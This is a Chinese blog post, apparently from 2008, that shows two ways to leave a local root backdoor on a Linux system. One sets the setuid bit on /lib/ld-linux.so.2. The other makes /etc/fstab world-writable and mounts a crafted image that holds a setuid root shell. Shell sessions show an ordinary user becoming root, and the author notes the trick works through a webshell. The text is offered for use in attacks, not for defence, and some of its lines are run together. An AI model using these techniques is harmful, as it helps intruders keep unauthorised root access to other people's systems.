思路方法
:
uid
思路方法
其实8是很隐蔽
看看过程:[root@localdo
lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2
[root@localdo
lib]# chmod +s ld-linux.so.2[root@localdo
lib]# ls -l |grep ld-2.7.so-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so
[root@localdo
lib]#我们这里给/lib/ld-linux.so.2这个文件(在FC8里
它指向ld-2.7.so这个文件)加了uid属性然后我们看如何利用它普通用户登录
测试下权限:[xiaoyu@localdo
~]$ whoamixiaoyu
[xiaoyu@localdo
~]$ /lib/ld-linux.so.2 `which whoami`root
[xiaoyu@localdo
~]$恩
嘿嘿 root了吧具体如何生成root shell你们自己去想吧凡事都不要点得太透对吧呵呵可以肯定点/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell bash检查euid 和uid看是否相等...OK不多说了思路方法 2:
看过程:
[root@localdo
etc]# chmod a+w /etc/fstab[root@localdo
etc]#这就留好了
此思路方法比较XXOXX估计没几个管理员知道利用思路方法演示下[xiaoyu@localdo
~]$ ls -l /etc/fstab-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab
[xiaoyu@localdo
~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab然后从本机把
个文件到目标机器上去这里我们命名为test[xiaoyu@localdo
tmp]$ ls -l test-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test
[xiaoyu@localdo
tmp]$ mount test[xiaoyu@localdo
tmp]$ cd /mnt[xiaoyu@localdo
mnt]$ ls -ltotal 18
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found
-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root
[xiaoyu@localdo
mnt]$ ./rootsh-3.2#
看到了吧
从普通用户提升到root了呵呵test这个文件baidu貌似木有上传功能撒
木办法传貌似可能有人说本地后门木啥鸟用
但是你要搞清楚:个webshell里面就可以完成这切....
最新评论